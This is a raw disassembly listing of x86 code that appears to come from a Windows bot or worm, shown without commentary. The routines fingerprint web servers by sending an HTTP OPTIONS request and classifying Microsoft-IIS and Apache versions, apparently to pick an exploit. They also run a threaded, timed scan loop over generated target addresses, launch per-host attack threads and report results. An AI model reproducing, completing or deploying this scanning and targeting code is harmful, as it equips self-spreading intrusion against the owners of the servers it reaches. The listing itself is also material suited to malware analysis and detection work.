push dword ptr [ebp-8]
call sub_412919
pop ecx
mov [ebp-48h], eax
cmp dword ptr [ebp-48h], 0
jnz short loc_412D8A
push dword ptr [ebp-8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412D8A: ; CODE XREF: .text:00412D7B�j
lea eax, [ebp-44h]
push eax
push dword ptr [ebp-48h]
call sub_41294E
pop ecx
pop ecx
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz short loc_412DAE
push dword ptr [ebp-8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DAE: ; CODE XREF: .text:00412D9F�j
push dword ptr [ebp-8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412DC8
push dword ptr [ebp-8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DC8: ; CODE XREF: .text:00412DB9�j
push offset dword_41CC6C
push dword ptr [ebp-8]
lea eax, [ebp-44h]
push eax
push dword ptr [ebp-4]
call sub_4129CA
add esp, 10h
push 1
push dword ptr [ebp-8]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push dword ptr [ebp-8]
call sub_4053B1
pop ecx
xor eax, eax
locret_412E00: ; CODE XREF: .text:00412D88�j
; .text:00412DAC�j ...
leave
retn 4
; ---------------------------------------------------------------------------
loc_412E04: ; DATA XREF: sub_412F07+B0�o
push ebp
mov ebp, esp
sub esp, 1B8h
push 1ADh
push dword ptr [ebp+8]
lea eax, [ebp-1B4h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp-1B0h]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz short loc_412E59
push dword ptr [ebp-1B4h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_412F03
; ---------------------------------------------------------------------------
loc_412E59: ; CODE XREF: .text:00412E44�j
lea eax, [ebp-1B0h]
push eax
mov eax, [ebp-1B4h]
push dword ptr [eax]
push offset dword_41CC70
lea eax, [ebp-1AAh]
push eax
call sub_40D53F
add esp, 10h
lea eax, [ebp-1B0h]
push eax
push offset dword_41EB24
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_412E8F: ; CODE XREF: .text:00412EBB�j
; .text:loc_412EEA�j
mov eax, [ebp-1B4h]
cmp dword ptr [eax+4], 0
jz short loc_412E9D
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412E9D: ; CODE XREF: .text:00412E99�j
push 3E8h
push dword ptr [ebp-4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp-1B8h], eax
cmp dword ptr [ebp-1B8h], 0FFFFFFFFh
jnz short loc_412EBD
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EBD: ; CODE XREF: .text:00412EB9�j
cmp dword ptr [ebp-1B8h], 0
jnz short loc_412EC8
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412EC8: ; CODE XREF: .text:00412EC4�j
push dword ptr [ebp-1B8h]
push offset loc_412D56
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_412EEA
push dword ptr [ebp-1B8h]
call sub_4053B1
pop ecx
loc_412EEA: ; CODE XREF: .text:00412EDC�j
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EEC: ; CODE XREF: .text:00412E9B�j
; .text:00412EC6�j
push dword ptr [ebp-4]
call sub_404CBB
pop ecx
push dword ptr [ebp-1B4h]
call sub_409763
pop ecx
xor eax, eax
locret_412F03: ; CODE XREF: .text:00412E54�j
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F07 proc near ; CODE XREF: sub_40A9CF+F6E�p
; .text:00413763�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_412F26
jmp locret_412FC4
; ---------------------------------------------------------------------------
loc_412F26: ; CODE XREF: sub_412F07+18�j
cmp [ebp+arg_4], 0
jz short loc_412F3A
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
jmp short loc_412F4E
; ---------------------------------------------------------------------------
loc_412F3A: ; CODE XREF: sub_412F07+23�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_412F4E: ; CODE XREF: sub_412F07+31�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_412F63
cmp [ebp+var_4], 0FFFFh
jbe short loc_412F77
loc_412F63: ; CODE XREF: sub_412F07+51�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_412F77: ; CODE XREF: sub_412F07+5A�j
push 0Ah
mov eax, [ebp+var_8]
add eax, 4
push eax
push [ebp+var_4]
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_4]
push offset dword_41CCA8
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset loc_412E04
call sub_4095A4
add esp, 14h
locret_412FC4: ; CODE XREF: sub_412F07+1A�j
leave
retn
sub_412F07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FC6 proc near ; CODE XREF: .text:004168CB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_412FD8
; ---------------------------------------------------------------------------
loc_412FD1: ; CODE XREF: sub_412FC6:loc_413088�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412FD8: ; CODE XREF: sub_412FC6+9�j
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz locret_41308D
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ecx, dword_41CCF6[ecx]
and ecx, 0FFh
mov eax, off_41CCFE[eax]
sub eax, ecx
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov off_41CCFE[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
and dword_41CCFA[eax], 0
loc_413024: ; CODE XREF: sub_412FC6+7E�j
; sub_412FC6+BE�j
call sub_410422
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov dword_41CCF6[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp dword_41CCF6[eax], 0
jnz short loc_413046
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413046: ; CODE XREF: sub_412FC6+7C�j
and [ebp+var_8], 0
jmp short loc_413053
; ---------------------------------------------------------------------------
loc_41304C: ; CODE XREF: sub_412FC6:loc_413086�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_413053: ; CODE XREF: sub_412FC6+84�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz short loc_413088
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jz short loc_413086
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_8]
imul ecx, 3Ah
mov eax, dword_41CCF6[eax]
cmp eax, dword_41CCF6[ecx]
jnz short loc_413086
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: sub_412FC6+A2�j
; sub_412FC6+BC�j
jmp short loc_41304C
; ---------------------------------------------------------------------------
loc_413088: ; CODE XREF: sub_412FC6+9A�j
jmp loc_412FD1
; ---------------------------------------------------------------------------
locret_41308D: ; CODE XREF: sub_412FC6+1F�j
leave
retn
sub_412FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41308F proc near ; CODE XREF: .text:00413390�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 820h
push 16h
push offset aOptionsHttp1_0 ; "OPTIONS / HTTP/1.0\r\n\r\n"
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_4130C4
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130C4: ; CODE XREF: sub_41308F+2C�j
push 0
push 800h
lea eax, [ebp+var_810]
push eax
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4130F3
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4130F3
cmp [ebp+var_8], 800h
jnz short loc_4130FA
loc_4130F3: ; CODE XREF: sub_41308F+53�j
; sub_41308F+59�j
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130FA: ; CODE XREF: sub_41308F+62�j
mov eax, [ebp+var_8]
and [ebp+eax+var_810], 0
and [ebp+var_4], 0
push offset aServer ; "Server:"
lea eax, [ebp+var_810]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_41312C
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41312C: ; CODE XREF: sub_41308F+94�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+var_10]
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413150
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413150: ; CODE XREF: sub_41308F+B8�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413173
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413173: ; CODE XREF: sub_41308F+DB�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
push 0Dh
push offset aMicrosoftIis ; "Microsoft-IIS"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41323C
and [ebp+var_818], 0
and [ebp+var_814], 0
lea eax, [ebp+var_814]
push eax
lea eax, [ebp+var_818]
push eax
push offset aMicrosoftIisU_ ; "Microsoft-IIS/%u.%u"
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 10h
cmp [ebp+var_818], 4
jnz short loc_4131E9
cmp [ebp+var_814], 0
jnz short loc_4131E9
push 4
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4131E9: ; CODE XREF: sub_41308F+147�j
; sub_41308F+150�j
cmp [ebp+var_818], 5
jnz short loc_413203
cmp [ebp+var_814], 0
jnz short loc_413203
push 3
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413203: ; CODE XREF: sub_41308F+161�j
; sub_41308F+16A�j
cmp [ebp+var_818], 5
jnz short loc_41321D
cmp [ebp+var_814], 5
jnz short loc_41321D
push 2
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41321D: ; CODE XREF: sub_41308F+17B�j
; sub_41308F+184�j
cmp [ebp+var_818], 6
jnz short loc_413237
cmp [ebp+var_814], 0
jnz short loc_413237
push 1
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413237: ; CODE XREF: sub_41308F+195�j
; sub_41308F+19E�j
jmp loc_41331A
; ---------------------------------------------------------------------------
loc_41323C: ; CODE XREF: sub_41308F+10E�j
cmp [ebp+var_C], 0
jz loc_41331A
push 6
push offset aApache ; "Apache"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41331A
and [ebp+var_820], 0
lea eax, [ebp+var_820]
push eax
push offset aApacheU ; "Apache/%u"
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 0Ch
push 6
push offset aUnix ; "(Unix)"
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
mov [ebp+var_81C], eax
cmp [ebp+var_81C], 1
jnz short loc_4132BE
push 7
push offset aWin32 ; "(Win32)"
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_4132BE
xor eax, eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132BE: ; CODE XREF: sub_41308F+213�j
; sub_41308F+229�j
cmp [ebp+var_820], 1
jnz short loc_4132D5
cmp [ebp+var_81C], 0
jz short loc_4132D5
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132D5: ; CODE XREF: sub_41308F+236�j
; sub_41308F+23F�j
cmp [ebp+var_820], 1
jnz short loc_4132EC
cmp [ebp+var_81C], 0
jnz short loc_4132EC
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132EC: ; CODE XREF: sub_41308F+24D�j
; sub_41308F+256�j
cmp [ebp+var_820], 2
jnz short loc_413303
cmp [ebp+var_81C], 0
jz short loc_413303
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_413303: ; CODE XREF: sub_41308F+264�j
; sub_41308F+26D�j
cmp [ebp+var_820], 2
jnz short loc_41331A
cmp [ebp+var_81C], 0
jnz short loc_41331A
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_41331A: ; CODE XREF: sub_41308F:loc_413237�j
; sub_41308F+1B1�j ...
xor eax, eax
locret_41331C: ; CODE XREF: sub_41308F+30�j
; sub_41308F+66�j ...
leave
retn
sub_41308F endp
; ---------------------------------------------------------------------------
loc_41331E: ; DATA XREF: .text:00413987�o
; .text:00413F2F�o
push ebp
mov ebp, esp
sub esp, 14Ch
push 14Ch
push dword ptr [ebp+8]
lea eax, [ebp-14Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push 1
push dword ptr [ebp-10Eh]
call sub_404457
pop ecx
pop ecx
lea eax, [ebp-10Ah]
push eax
push dword ptr [ebp-10Eh]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_413381
push dword ptr [ebp-10Eh]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_413381: ; CODE XREF: .text:0041336C�j
cmp dword ptr [ebp-112h], 0
jz short loc_4133B1
push dword ptr [ebp-10Eh]
call sub_41308F
pop ecx
cmp [ebp-112h], eax
jz short loc_4133B1
push dword ptr [ebp-10Eh]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_4133B1: ; CODE XREF: .text:00413388�j
; .text:0041339C�j
cmp dword ptr [ebp-8Ah], 1
jnz short loc_4133E0
lea eax, [ebp-6]
push eax
push dword ptr [ebp-10Eh]
call sub_404552
pop ecx
pop ecx
push offset dword_41EF48
lea eax, [ebp-86h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_4133E0: ; CODE XREF: .text:004133B8�j
cmp dword ptr [ebp-8Ah], 2
jnz short loc_413420
push 0Ah
lea eax, [ebp-6]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp-10Ah]
push eax
lea eax, [ebp-86h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_413420: ; CODE XREF: .text:004133E7�j
call sub_412D4C
push eax
lea eax, [ebp-6]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41EF48
lea eax, [ebp-86h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_413444: ; CODE XREF: .text:004133DE�j
; .text:0041341E�j
lea eax, [ebp-14Ch]
push eax
call dword ptr [ebp-11Ah]
cmp dword ptr [ebp-8Ah], 1
jnz short loc_41346F
push dword ptr [ebp-10Eh]
push dword ptr [ebp-14Ch]
call sub_412A3A
pop ecx
pop ecx
jmp short loc_41348A
; ---------------------------------------------------------------------------
loc_41346F: ; CODE XREF: .text:00413458�j
cmp dword ptr [ebp-8Ah], 2
jnz short loc_41348A
lea eax, [ebp-6]
push eax
lea eax, [ebp-86h]
push eax
call sub_412BC9
pop ecx
pop ecx
loc_41348A: ; CODE XREF: .text:0041346D�j
; .text:00413476�j
push dword ptr [ebp-10Eh]
call sub_4053B1
pop ecx
xor eax, eax
locret_413498: ; CODE XREF: .text:0041337C�j
; .text:004133AC�j
leave
retn 4
; ---------------------------------------------------------------------------
loc_41349C: ; DATA XREF: sub_413AB0+1F4�o
push ebp
mov ebp, esp
sub esp, 764h
push edi
push 2C9h
push dword ptr [ebp+8]
lea eax, [ebp-628h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
lea eax, [ebp-51Ch]
push eax
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_4134F5
push 14Ch
push 0
lea eax, [ebp-358h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4135BF
; ---------------------------------------------------------------------------
loc_4134F5: ; CODE XREF: .text:004134D8�j
and dword ptr [ebp-62Ch], 0
jmp short loc_41350B
; ---------------------------------------------------------------------------
loc_4134FE: ; CODE XREF: .text:loc_4135BA�j
mov eax, [ebp-62Ch]
inc eax
mov [ebp-62Ch], eax
loc_41350B: ; CODE XREF: .text:004134FC�j
mov eax, [ebp-62Ch]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
push eax
lea eax, [ebp-640h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp-640h]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp-51Ch]
push eax
lea eax, [ebp-640h]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_4135BA
mov eax, [ebp-62Ch]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
mov [ebp-358h], eax
push 3Ah
mov eax, [ebp-62Ch]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
push eax
lea eax, [ebp-354h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp-354h]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp-341h]
push eax
call sub_4105FB
pop ecx
and dword ptr [ebp-296h], 0
lea eax, [ebp-341h]
push eax
lea eax, [ebp-51Ch]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4135BF
; ---------------------------------------------------------------------------
loc_4135BA: ; CODE XREF: .text:0041354C�j
jmp loc_4134FE
; ---------------------------------------------------------------------------
loc_4135BF: ; CODE XREF: .text:004134F0�j
; .text:004135B8�j
lea eax, [ebp-624h]
push eax
call sub_40806A
pop ecx
test eax, eax
jnz short loc_4135E3
push dword ptr [ebp-628h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_4135E3: ; CODE XREF: .text:004135CE�j
mov al, byte_41DE30
mov [ebp-20Ch], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp-20Bh]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp-108h], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp-107h]
rep stosd
stosw
stosb
lea eax, [ebp-108h]
push eax
lea eax, [ebp-624h]
push eax
lea eax, [ebp-20Ch]
push eax
call sub_407F3D
add esp, 0Ch
test eax, eax
jnz short loc_41364D
push dword ptr [ebp-628h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_41364D: ; CODE XREF: .text:00413638�j
push dword ptr [ebp-506h]
call sub_404D10
pop ecx
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_413675
push dword ptr [ebp-628h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_413675: ; CODE XREF: .text:00413660�j
cmp dword ptr [ebp-358h], 0
jz loc_413782
mov eax, [ebp-358h]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413782
call sub_4042FB
mov [ebp-644h], eax
cmp dword ptr [ebp-644h], 0
jz short loc_4136B6
mov dword ptr [ebp-296h], 2
jmp short loc_4136C0
; ---------------------------------------------------------------------------
loc_4136B6: ; CODE XREF: .text:004136A8�j
mov dword ptr [ebp-296h], 3
loc_4136C0: ; CODE XREF: .text:004136B4�j
movsx eax, byte ptr [ebp-36Bh]
test eax, eax
jz short loc_4136E5
mov eax, [ebp-358h]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_4136E5
mov dword ptr [ebp-296h], 1
loc_4136E5: ; CODE XREF: .text:004136C9�j
; .text:004136D9�j
movsx eax, byte ptr [ebp-37Bh]
test eax, eax
jz short loc_4136FA
mov dword ptr [ebp-296h], 2
loc_4136FA: ; CODE XREF: .text:004136EE�j
movsx eax, byte ptr [ebp-37Ah]
test eax, eax
jz short loc_41370F
mov dword ptr [ebp-296h], 3
loc_41370F: ; CODE XREF: .text:00413703�j
cmp dword ptr [ebp-296h], 3
jnz short loc_41372B
cmp dword ptr [ebp-644h], 0
jz short loc_41372B
mov dword ptr [ebp-296h], 2
loc_41372B: ; CODE XREF: .text:00413716�j
; .text:0041371F�j
cmp dword ptr [ebp-296h], 3
jnz short loc_413782
mov al, [ebp-36Ah]
mov [ebp-64Ch], al
mov al, [ebp-377h]
mov [ebp-648h], al
mov byte ptr [ebp-36Ah], 1
and byte ptr [ebp-377h], 0
push 0
lea eax, [ebp-502h]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp-64Ch]
mov [ebp-36Ah], al
mov al, [ebp-648h]
mov [ebp-377h], al
loc_413782: ; CODE XREF: .text:0041367C�j
; .text:00413690�j ...
push offset dword_41E2D8
call sub_409C6C
pop ecx
push dword ptr [ebp-50Eh]
lea eax, [ebp-51Ch]
push eax
lea eax, [ebp-624h]
push eax
push offset dword_41CE78
mov eax, [ebp-628h]
add eax, 14h
push eax
call sub_416B5E ; sprintf
add esp, 14h
push offset dword_41E2D8
call sub_409C7A
pop ecx
push dword ptr [ebp-50Eh]
lea eax, [ebp-51Ch]
push eax
lea eax, [ebp-624h]
push eax
mov eax, [ebp-628h]
push dword ptr [eax]
push offset dword_41CE40
lea eax, [ebp-502h]
push eax
call sub_40D53F
add esp, 18h
cmp dword ptr [ebp-358h], 0
jnz short loc_413807
push 3E8h
call ds:dword_41709C ; Sleep
loc_413807: ; CODE XREF: .text:004137FA�j
and dword ptr [ebp-10Ch], 0
call sub_416B64 ; clock
mov [ebp-35Ch], eax
and dword ptr [ebp-4], 0
loc_41381D: ; CODE XREF: .text:00413895�j
; .text:004138E7�j ...
mov eax, [ebp-628h]
cmp dword ptr [eax+4], 0
jnz short loc_413847
call sub_416B64 ; clock
add eax, [ebp-4]
sub eax, [ebp-35Ch]
mov ecx, [ebp-50Eh]
imul ecx, 3E8h
cmp eax, ecx
jb short loc_41384C
loc_413847: ; CODE XREF: .text:00413827�j
jmp loc_413A43
; ---------------------------------------------------------------------------
loc_41384C: ; CODE XREF: .text:00413845�j
lea eax, [ebp-108h]
push eax
lea eax, [ebp-20Ch]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp-108h]
push eax
lea eax, [ebp-624h]
push eax
lea eax, [ebp-20Ch]
push eax
call sub_407F3D
add esp, 0Ch
push offset dword_41EF48
lea eax, [ebp-20Ch]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413897
jmp short loc_41381D
; ---------------------------------------------------------------------------
loc_413897: ; CODE XREF: .text:00413893�j
push dword ptr [ebp-8]
push 0
lea eax, [ebp-51Ch]
push eax
lea eax, [ebp-20Ch]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp-650h], eax
cmp dword ptr [ebp-650h], 0
jz short loc_4138EC
call sub_416B64 ; clock
add eax, [ebp-4]
sub eax, [ebp-35Ch]
mov ecx, [ebp-50Eh]
imul ecx, 3E8h
cmp eax, ecx
jnb short loc_4138EC
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_4138EC: ; CODE XREF: .text:004138C7�j
; .text:004138E5�j
push dword ptr [ebp-50Ah]
call ds:dword_41709C ; Sleep
push dword ptr [ebp-8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_413A35
loc_413909: ; CODE XREF: .text:00413956�j
; .text:loc_413A30�j
push dword ptr [ebp-8]
call sub_404F24
pop ecx
mov [ebp-654h], eax
cmp dword ptr [ebp-654h], 0
jnz short loc_413926
jmp loc_413A35
; ---------------------------------------------------------------------------
loc_413926: ; CODE XREF: .text:0041391F�j
mov eax, [ebp-10Ch]
inc eax
mov [ebp-10Ch], eax
cmp dword ptr [ebp-358h], 0
jz short loc_4139B7
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp-658h], eax
cmp dword ptr [ebp-658h], 0
jnz short loc_413958
jmp short loc_413909
; ---------------------------------------------------------------------------
loc_413958: ; CODE XREF: .text:00413954�j
push 14Ch
lea eax, [ebp-358h]
push eax
push dword ptr [ebp-658h]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-658h]
mov ecx, [ebp-654h]
mov [eax+3Eh], ecx
push dword ptr [ebp-658h]
push offset loc_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4139A5
push dword ptr [ebp-658h]
call sub_416B4C ; free
pop ecx
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139A5: ; CODE XREF: .text:00413995�j
push dword ptr [ebp-8]
push dword ptr [ebp-654h]
call sub_404D9B
pop ecx
pop ecx
loc_4139B5: ; CODE XREF: .text:004139A3�j
jmp short loc_413A30
; ---------------------------------------------------------------------------
loc_4139B7: ; CODE XREF: .text:0041393A�j
mov eax, [ebp-628h]
cmp dword ptr [eax+4], 0
jz short loc_4139C5
jmp short loc_413A35
; ---------------------------------------------------------------------------
loc_4139C5: ; CODE XREF: .text:004139C1�j
lea eax, [ebp-75Ch]
push eax
push dword ptr [ebp-654h]
call sub_4044F7
pop ecx
pop ecx
mov al, [ebp-36Ah]
mov [ebp-65Ch], al
and byte ptr [ebp-36Ah], 0
lea eax, [ebp-51Ch]
push eax
lea eax, [ebp-75Ch]
push eax
push offset dword_41CE2C
lea eax, [ebp-502h]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp-65Ch]
mov [ebp-36Ah], al
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp-4]
add eax, 3E8h
mov [ebp-4], eax
loc_413A30: ; CODE XREF: .text:loc_4139B5�j
jmp loc_413909
; ---------------------------------------------------------------------------
loc_413A35: ; CODE XREF: .text:00413903�j
; .text:00413921�j ...
push dword ptr [ebp-8]
call sub_404F7D
pop ecx
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_413A43: ; CODE XREF: .text:loc_413847�j
push dword ptr [ebp-10Ch]
call sub_416B64 ; clock
sub eax, [ebp-35Ch]
mov [ebp-764h], eax
and dword ptr [ebp-760h], 0
fild qword ptr [ebp-764h]
fdiv ds:flt_417270
push ecx
push ecx
fstp qword ptr [esp]
lea eax, [ebp-51Ch]
push eax
lea eax, [ebp-624h]
push eax
push offset unk_41CDE8
lea eax, [ebp-502h]
push eax
call sub_40D53F
add esp, 1Ch
push dword ptr [ebp-8]
call sub_404FD0
pop ecx
push dword ptr [ebp-628h]
call sub_409763
pop ecx
xor eax, eax
loc_413AAB: ; CODE XREF: .text:004135DE�j
; .text:00413648�j ...
pop edi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AB0 proc near ; CODE XREF: sub_40A9CF+BCB�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
cmp [ebp+arg_4], 0
jz short loc_413AC2
cmp [ebp+arg_8], 0
jnz short loc_413AC7
loc_413AC2: ; CODE XREF: sub_413AB0+A�j
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AC7: ; CODE XREF: sub_413AB0+10�j
push [ebp+arg_8]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_413AEB
push [ebp+arg_8]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_413AE9
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AE9: ; CODE XREF: sub_413AB0+32�j
jmp short loc_413B45
; ---------------------------------------------------------------------------
